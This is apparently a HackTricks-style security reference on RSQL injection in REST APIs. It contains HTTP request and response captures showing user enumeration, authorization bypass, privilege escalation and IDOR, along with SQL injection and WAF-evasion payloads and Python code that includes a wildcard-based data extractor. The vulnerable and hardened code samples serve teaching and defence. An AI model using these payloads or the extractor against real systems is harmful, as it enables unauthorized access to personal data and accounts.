RSQL Injection
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
What is RSQL?
RSQL is a query language designed for parameter-based filtering of entries in RESTful APIs. It is based on FIQL (Feed Item Query Language), originally specified by Mark Nottingham for querying Atom feeds, and stands out for its simplicity and for expressing complex queries in a compact, URI-friendly form that travels over HTTP. This makes it a good choice as a generic query language for searching REST endpoints.
Overview
RSQL Injection is a vulnerability in web applications that use RSQL as the query language of their RESTful APIs. Like SQL Injection and LDAP Injection, it arises when RSQL filters are not properly validated, allowing an attacker to inject malicious queries that read, modify or delete data without authorization.
How does it work?
RSQL lets you build complex queries against RESTful APIs, for example:
/products?filter=price>100;category==electronics
This is translated into a structured query that returns products whose price is greater than 100 and whose category is "electronics".
If the application does not validate user input properly, an attacker can manipulate the filter so that the backend executes queries it never intended, such as:
/products?filter=id=in=(1,2,3);delete_all==true
Or use the filter to extract sensitive information through Boolean queries or nested subqueries.
Risks
- Exposure of sensitive data: an attacker can retrieve information that should not be accessible.
- Data modification or deletion: injection of filters that alter database records.
- Privilege escalation: manipulation of the identifiers that grant roles, through filters, to trick the application into granting another user's permissions.
- Access control bypass: manipulation of filters to reach restricted data.
- Impersonation or IDOR: changing identifiers between users through filters, which gives access to other users' information and resources without proper authorization checks.
Supported RSQL operators
| Operator | Description | Example |
|---|---|---|
| `;` / `and` | Logical AND. Matches rows where both criteria are true | `/api/v2/myTable?q=columnA==valueA;columnB==valueB` |
| `,` / `or` | Logical OR. Matches rows where at least one of the conditions is true | `/api/v2/myTable?q=columnA==valueA,columnB==valueB` |
| `==` | Equality query. Returns all rows from myTable where the value in columnA exactly matches queryValue | `/api/v2/myTable?q=columnA==queryValue` |
| `=q=` | Search query. Returns all rows from myTable where the value in columnA contains queryValue | `/api/v2/myTable?q=columnA=q=queryValue` |
| `=like=` | Like query. Returns all rows from myTable where the value in columnA is like queryValue | `/api/v2/myTable?q=columnA=like=queryValue` |
| `=in=` | In query. Returns all rows from myTable where columnA is valueA OR valueB | `/api/v2/myTable?q=columnA=in=(valueA,valueB)` |
| `=out=` | Exclude query. Returns all rows from myTable where the value in columnA is neither valueA nor valueB | `/api/v2/myTable?q=columnA=out=(valueA,valueB)` |
| `!=` | Not-equal query. Returns all rows from myTable where the value in columnA does not match queryValue | `/api/v2/myTable?q=columnA!=queryValue` |
| `=notlike=` | Not-like query. Returns all rows from myTable where the value in columnA is not like queryValue | `/api/v2/myTable?q=columnA=notlike=queryValue` |
| `<` & `=lt=` | Less-than query. Returns all rows from myTable where the value in columnA is less than queryValue | `/api/v2/myTable?q=columnA<queryValue` or `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | Less-than-or-equal query. Returns all rows from myTable where the value in columnA is less than or equal to queryValue | `/api/v2/myTable?q=columnA<=queryValue` or `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | Greater-than query. Returns all rows from myTable where the value in columnA is greater than queryValue | `/api/v2/myTable?q=columnA>queryValue` or `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | Greater-than-or-equal query. Returns all rows from myTable where the value in columnA is greater than or equal to queryValue | `/api/v2/myTable?q=columnA>=queryValue` or `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | Range query. Returns all rows from myTable where the value in columnA is greater than or equal to fromValue and less than or equal to toValue | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
Note: table compiled from the MOLGENIS and rsql-parser documentation.
Examples
Each FIQL-style expression is followed by the same query written with the `and`/`or` keyword forms, which rsql-parser also accepts:
- `name=="Kill Bill";year=gt=2003`
- `name=="Kill Bill" and year>2003`
- `genres=in=(sci-fi,action);(director=='Christopher Nolan',actor==*Bale);year=ge=2000`
- `genres=in=(sci-fi,action) and (director=='Christopher Nolan' or actor==*Bale) and year>=2000`
- `director.lastName==Nolan;year=ge=2000;year=lt=2010`
- `director.lastName==Nolan and year>=2000 and year<2010`
- `genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino`
- `genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino`
Note: examples taken from the rsql-parser project.
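As an added example (not code from the original page nor from rsql-parser), the following Python parses the grammar behind the operator table and the examples above, evaluates it against constructed records, and contrasts the string-concatenated filter composition described under "How does it work?" with a version that parses first and allow-lists selectors. The field names (`tenantId`, `category`, `price`), the rows and the allow-list are assumptions made for the demo; the `*` wildcard semantics are those of Elide/Spring-style backends, not something rsql-parser itself defines.

```python
import fnmatch
import operator
import re

# Added example, not code from the original page: a small parser/evaluator for the RSQL
# grammar above (';' AND, ',' OR, AND binds tighter, parentheses group) used to show why
# gluing a user filter onto a server-side scope by string concatenation is unsafe.
# Field names, the tenant scope and the records are constructed for the demo.
COMPARISON = re.compile(r"""
    (?P<selector>[A-Za-z_][\w.]*)
    (?P<op>==|!=|=[a-z]+=|<=|>=|<|>)
    (?: \((?P<args>[^)]*)\)       # =in=(a,b) style argument list
      | '(?P<sq>[^']*)'           # single-quoted argument
      | "(?P<dq>[^"]*)"           # double-quoted argument
      | (?P<bare>[^,;()'"]+) )    # bare argument; '*' is a wildcard in most backends
    """, re.X)

class RsqlParser:
    # Recursive descent; nodes are ("and", [..]), ("or", [..]) or ("cmp", selector, op, value)
    def __init__(self, text):
        self.s, self.i = text, 0
    def parse(self):
        node = self._or()
        if self.i != len(self.s):
            raise ValueError(f"unexpected input at {self.i}: {self.s[self.i:]!r}")
        return node
    def _list(self, sep, sub, kind):  # sep-separated operands of one logical operator
        nodes = [sub()]
        while self.s[self.i:self.i + 1] == sep:
            self.i += 1
            nodes.append(sub())
        return (kind, nodes) if len(nodes) > 1 else nodes[0]
    def _or(self):
        return self._list(",", self._and, "or")
    def _and(self):
        return self._list(";", self._factor, "and")
    def _factor(self):
        if self.s[self.i:self.i + 1] == "(":
            self.i += 1
            node = self._or()
            if self.s[self.i:self.i + 1] != ")":
                raise ValueError(f"expected ')' at {self.i}")
            self.i += 1
            return node
        m = COMPARISON.match(self.s, self.i)
        if not m:
            raise ValueError(f"bad comparison at {self.i}: {self.s[self.i:]!r}")
        self.i = m.end()
        if m.group("args") is not None:
            value = [a.strip().strip("'\"") for a in m.group("args").split(",")]
        else:
            value = next(v for v in m.group("sq", "dq", "bare") if v is not None)
        return ("cmp", m.group("selector"), m.group("op"), value)

ORDER_OPS = {"<": operator.lt, "=lt=": operator.lt, "<=": operator.le, "=le=": operator.le,
             ">": operator.gt, "=gt=": operator.gt, ">=": operator.ge, "=ge=": operator.ge}

def evaluate(node, record):
    # Evaluate a tree against one dict; dotted selectors walk nested dicts
    if node[0] in ("and", "or"):
        return (all if node[0] == "and" else any)(evaluate(n, record) for n in node[1])
    _, selector, op, value = node
    actual = record
    for part in selector.split("."):
        actual = actual.get(part) if isinstance(actual, dict) else None
    if actual is None:
        return False
    if op in ("==", "!="):  # '*' wildcard, as Elide/Spring RSQL backends treat it
        return fnmatch.fnmatchcase(str(actual), str(value)) == (op == "==")
    if op in ("=in=", "=out="):
        return (str(actual) in value) == (op == "=in=")
    if op in ORDER_OPS:
        try:
            return ORDER_OPS[op](float(actual), float(value))
        except ValueError:
            return ORDER_OPS[op](str(actual), str(value))
    raise ValueError(f"unsupported operator {op}")

def selectors(node):  # every selector referenced anywhere in the tree
    return [node[1]] if node[0] == "cmp" else [s for c in node[1] for s in selectors(c)]
def run_query(tree, records):
    return [r["id"] for r in records if evaluate(tree, r)]
def naive_query(user_filter, tenant_id):
    # Vulnerable: ';' binds tighter than ',', so a ',' (OR) in the user filter escapes the scope
    return RsqlParser(f"tenantId=={tenant_id};{user_filter}").parse()

ALLOWED_SELECTORS = {"category", "price"}
def scoped_query(user_filter, tenant_id):
    # Hardened: parse first, allow-list selectors, then AND the scope at the tree level
    tree = RsqlParser(user_filter).parse()
    bad = set(selectors(tree)) - ALLOWED_SELECTORS
    if bad:
        raise ValueError(f"selectors not allowed: {sorted(bad)}")
    return ("and", [("cmp", "tenantId", "==", str(tenant_id)), tree])

PRODUCTS = [  # constructed rows for two tenants
    {"id": 1, "tenantId": 1, "category": "electronics", "price": 120},
    {"id": 2, "tenantId": 1, "category": "books", "price": 15},
    {"id": 3, "tenantId": 2, "category": "electronics", "price": 300},
    {"id": 4, "tenantId": 2, "category": "toys", "price": 40},
]
```

The injected filter `category==electronics,tenantId==2` works against `naive_query` because `;` binds tighter than `,`: `tenantId==1;category==electronics,tenantId==2` parses as `(tenantId==1 AND category==electronics) OR tenantId==2`, so the other tenant's rows come back. `scoped_query` never lets the user's text touch the scope string and rejects the `tenantId` selector outright, which is the fix to look for in a code review.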
Common filters
These filters help refine queries in APIs:
| Filter | Description | Example |
|---|---|---|
| `filter[users]` | Filters results by specific users | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | Filters by status (active/inactive, completed, etc.) | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | Filters results within a date range | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | Filters by category or resource type | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | Filters by unique identifier | `/api/v2/posts?filter[id]=42` |
Common parameters
These parameters help shape API responses:
| Parameter | Description | Example |
|---|---|---|
| `include` | Includes related resources in the response | `/api/v2/orders?include=customer,items` |
| `sort` | Sorts results in ascending or descending order | `/api/v2/users?sort=-created_at` |
| `page[size]` | Controls the number of results per page | `/api/v2/products?page[size]=10` |
| `page[number]` | Selects the page number | `/api/v2/products?page[number]=2` |
| `fields[resource]` | Specifies which fields to return in the response | `/api/v2/users?fields[users]=id,name,email` |
| `search` | Performs a more flexible search | `/api/v2/posts?search=technology` |
Information leakage and enumeration of users
The following request shows a registration endpoint that requires the email parameter to check if there is any user registered with that email and return a true or false depending on whether or not it exists in the database:
Request
GET /api/registrations HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
Content-Type: application/vnd.api+json
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 85
{
"errors": [{
"code": "BLANK",
"detail": "Missing required param: email",
"status": "400"
}]
}
Although the endpoint expects /api/registrations?email=<emailAccount>, it is possible to use RSQL filters with special operators to enumerate and/or extract user information instead:
Ombi
GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 38
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"attributes": {
"tenants": []
}
}
}
When a valid email account is found, the application returns the user's information instead of the "true", "1" or similar value the server was designed to reply with:
Request
GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 293
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"id": "********************",
"type": "UserAccountDTO",
"attributes": {
"id": "********************",
"type": "UserAccountDTO",
"email": "manuel**********@domain.local",
"sub": "*********************",
"status": "ACTIVE",
"tenants": [{
"id": "1"
}]
}
}
}
Authorization evasion
In this scenario we start with a user who has a basic role and lacks the special privileges (for example administrator) required to list all users registered in the database:
Request
GET /api/users HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
Content-Length: 0
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Again we use filters and special operators that give us an alternative way to reach user data and bypass the access control. For example, filter for the users whose user ID contains the letter "a":
Request
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 1434192
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "********A***********",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "**********@domain.local",
"firstName": "rafael",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "*********",
"taxIdentifier": "********",
"languageId": 1,
"createdAt": "2024-08-09T10:57:41.237Z",
"termsOfUseAccepted": true,
"id": "******************",
"type": "UserGetResponseCustomDTO"
}
}, {
"id": "*A*******A*****A*******A******",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "juan*******@domain.local",
"firstName": "juan",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "************",
"taxIdentifier": "************",
"languageId": 1,
"createdAt": "2024-07-18T06:07:37.68Z",
"termsOfUseAccepted": true,
"id": "*******************",
"type": "UserGetResponseCustomDTO"
}
}, {
................
Privilege Escalation
It is common to find endpoints that check a user's privileges through their role. For example, here we are dealing with a user who has no privileges:
Request
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 11
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": []
}
Using certain operators we can enumerate the administrator users:
Request
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJh.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 361
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"type": "CompanyUserGetResponseDTO",
"attributes": {
"companyId": "FA**************",
"companyTaxIdentifier": "B999*******",
"bizName": "company sl",
"email": "jose*******@domain.local",
"userRole": {
"userRoleId": 1,
"userRoleKey": "general.roles.admin"
},
"companyCountryTranslationKey": "*******",
"type": "CompanyUserGetResponseDTO"
}
}]
}
Once the administrator's identifier is known, privilege escalation becomes possible by modifying or adding a filter that matches the administrator's identifier, which yields the same privileges:
Request
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 68833
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"meta": {
"Functionalities": [{
"functionalityId": 1,
"permissionId": 1,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.userProfile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 2,
"permissionId": 2,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.my_profile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 3,
"permissionId": 3,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "layout.change_user_data",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 4,
"permissionId": 4,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.configuration",
"type": "FunctionalityPermissionDTO"
}, {
....
}]
}
}
Impersonate or Insecure Direct Object References (IDOR)
Besides the filter parameter, other parameters such as include can be used to pull certain attributes into the result (for example language, country, password…).
In the following example our own user profile is shown:
Request
GET /api/users?include=language,country HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 540
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "D5********************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "**********",
"email": "domingo....@domain.local",
"firstName": "Domingo",
"surname": "**********",
"telephoneCountryCode": "**",
"mobilePhone": "******",
"languageId": 1,
"createdAt": "2024-03-11T07:24:57.627Z",
"termsOfUseAccepted": true,
"howMeetUs": "**************",
"id": "D5********************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Combining filters lets us bypass the authorization control and access other users' profiles:
Request
GET /api/users?include=language,country&filter[users]=id=='94***************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 520
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "94******************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 2,
"translationKey": "**************",
"email": "jose******@domain.local",
"firstName": "jose",
"surname": "***************",
"telephoneCountryCode": "**",
"mobilePhone": "********",
"taxIdentifier": "*********",
"languageId": 1,
"createdAt": "2024-11-21T08:29:05.833Z",
"termsOfUseAccepted": true,
"id": "94******************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Discovery & fuzzing: quick wins
- Check for RSQL support by sending harmless probes such as `?filter=id==test`, `?q==test` or a malformed operator like `=foo=`; verbose APIs often leak parser errors ("Unknown operator" / "Unknown property").
- Many implementations double-parse URL parameters; try double-encoding `(`, `)`, `*`, `;` (e.g. `%2528admin%2529`) to get around naive blocklists and WAFs.
- Boolean exfiltration with wildcards: `filter[users]=email==*@example.com;status==ACTIVE`, then flip the logic to `,` (OR) and compare response sizes.
- Range/proximity leaks: `filter[users]=createdAt=rng=(2024-01-01,2025-01-01)` enumerates quickly by year without knowing exact IDs.
Framework-specific abuse (Elide / JPA Specification / JSON:API)
- Elide and many Spring Data REST projects translate RSQL directly into JPA Criteria. When developers add custom operators (e.g. `=ilike=`) and build predicates by string concatenation instead of prepared parameters, you can pivot to SQLi (typical payload: `name=ilike='%%' OR 1=1--'`).
- Elide's analytic data store accepts parameterized columns; mixing user-controlled analytic params with RSQL filters was the root cause of the SQLi in CVE-2022-24827. Even where the patched versions parameterize correctly, bespoke code of the same shape often remains: look for `@JoinFilter`/`@ReadPermission` SpEL expressions containing `${}` and try injecting `';sleep(5);'` or logical tautologies.
- JSON:API backends usually expose `include` and `filter`. Filtering on related resources (`filter[orders]=customer.email==*admin*`) can bypass top-level ACLs because relation-level filters are applied before the ownership checks.
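Added example, not code from the page, Elide or Spring Data: what a hand-written `=ilike=` operator of the kind the first bullet describes looks like as a SQL sink, with the RSQL argument concatenated into the predicate beside the parameterized version, run against an in-memory SQLite table. The table, its rows and the `x') OR 1=1--` payload (a variant of the one above, adapted to this particular predicate) are constructed for the demo.

```python
import sqlite3

# Added example, not code from the page or from Elide/Spring: a custom =ilike= operator
# implemented once by string concatenation (SQL injection) and once with a bound
# parameter. Table and rows are constructed; the tenant scope is always bound so the
# injection point is only the operator argument, as in the concatenation bug described.
SCHEMA = """
CREATE TABLE users (id INTEGER, tenant_id INTEGER, name TEXT);
INSERT INTO users VALUES (1, 1, 'Alice'), (2, 1, 'Bob'), (3, 2, 'Carol'), (4, 2, 'Dave');
"""

def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def rsql_to_like(arg):
    # Escape LIKE metacharacters that appear literally, then map the RSQL '*' wildcard to '%'
    return (arg.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
               .replace("*", "%"))

def ilike_vulnerable(db, tenant_id, arg):
    # The operator argument is pasted into the SQL text. arg = "x') OR 1=1--" closes
    # LOWER(...), ORs in a tautology and comments out the trailing ESCAPE clause, so the
    # tenant_id = ? scope is neutralised even though it was bound correctly.
    sql = ("SELECT id FROM users WHERE tenant_id = ? "
           f"AND LOWER(name) LIKE LOWER('{rsql_to_like(arg)}') ESCAPE '\\'")
    return [row[0] for row in db.execute(sql, (tenant_id,))]

def ilike_hardened(db, tenant_id, arg):
    # Same predicate with the argument bound; the payload is now just a name nobody has
    sql = ("SELECT id FROM users WHERE tenant_id = ? "
           "AND LOWER(name) LIKE LOWER(?) ESCAPE '\\'")
    return [row[0] for row in db.execute(sql, (tenant_id, rsql_to_like(arg)))]
```

`rsql_to_like` is the part reviewers tend to forget: even with binding in place, an unescaped `%` or `_` coming from the user turns a "starts with" filter into a full-table wildcard, which is a smaller leak but the same class of bug.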
Automation tools
- rsql-parser CLI (Java): `java -jar rsql-parser.jar "name=='*admin*';status==ACTIVE"` validates payloads locally and prints the abstract syntax tree, which is handy for crafting balanced parentheses and custom operators.
- Python quick builder:
```python
from pyrsql import RSQL
payload = RSQL().and_("email==*admin*", "status==ACTIVE").or_("role=in=(owner,admin)")
print(str(payload))
```
- Combine with an HTTP fuzzer (ffuf, turbo-intruder) to iterate wildcard positions `*a*`, `*e*`, etc. inside `=in=` lists and enumerate IDs and emails quickly.
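Added example, not code from the page: a boolean-oracle extractor for the wildcard enumeration used in the "Information leakage" and "Authorization evasion" sections and in the fuzzing bullets above. It recovers a record's attribute one character at a time from `==` wildcard filters, first using the page's `*a*` probes to learn which characters occur at all. The backend is simulated locally with a constructed user table; replacing `local_oracle` with an HTTP request to the URL from `build_url` (treating a non-empty `data` array or a larger `Content-Length` as True) turns it into the live tool. The paths, the `filter[resource]` parameter shape and the `*` wildcard semantics are assumptions taken from the requests shown earlier on this page.

```python
import fnmatch
import string
from urllib.parse import urlencode

# Added example, not code from the original page: a boolean-oracle extractor that recovers a
# hidden attribute one character at a time through '*' wildcards in an RSQL '==' filter.
# The backend is simulated with a constructed user table; a live run would replace
# local_oracle() with an HTTP request to the URL from build_url() and treat a non-empty
# "data" array (or a larger Content-Length) as True. Paths and field names are assumptions.
USERS = [
    {"id": "94A3F0C1", "email": "jose@domain.local", "status": "ACTIVE"},
    {"id": "D5B7E2A9", "email": "domingo@domain.local", "status": "ACTIVE"},
]
ALPHABET = string.ascii_letters + string.digits + "@._-"  # no '*', '?', '[' (wildcard chars)

def rsql_and(conditions):
    # conditions: [(selector, pattern), ...] joined with ';' (AND)
    return ";".join(f"{sel}=={pat}" for sel, pat in conditions)

def build_url(base, resource, conditions):
    # e.g. https://localhost:3000/api/users?filter%5Busers%5D=id%3D%3D9%2A
    return f"{base}/api/{resource}?" + urlencode({f"filter[{resource}]": rsql_and(conditions)})

def local_oracle(conditions):
    # True iff at least one user satisfies every condition ('*' as glob wildcard)
    return any(all(fnmatch.fnmatchcase(str(u[sel]), pat) for sel, pat in conditions)
               for u in USERS)

def present_chars(oracle, selector, pin=(), alphabet=ALPHABET):
    # The page's '*a*' trick: one query per character reveals which characters occur
    # anywhere in the target value, shrinking the alphabet for positional extraction
    return "".join(c for c in alphabet if oracle([(selector, f"*{c}*"), *pin]))

def extract_value(oracle, selector, pin=(), alphabet=ALPHABET, max_len=64):
    # Recover <selector> of the record(s) matching `pin` (extra AND conditions that narrow
    # the search to one record). Each step asks: does a pinned record match <known+c>* ?
    # If several records share the prefix, the first extension in alphabet order wins.
    known, queries = "", 0
    while len(known) < max_len:
        for c in alphabet:
            queries += 1
            if oracle([(selector, known + c + "*"), *pin]):
                known += c
                break
        else:  # no single-character extension matched: the value is complete
            break
    return known, queries
```

Against the registrations endpoint shown earlier the same loop runs without a `pin`, with `email` as the selector and "tenants non-empty" as the oracle. The `present_chars` pass costs one request per alphabet character and usually pays for itself by the second position; pin the target with a condition the attacker already knows (here the email prefix) so that the greedy prefix walk cannot wander into another record.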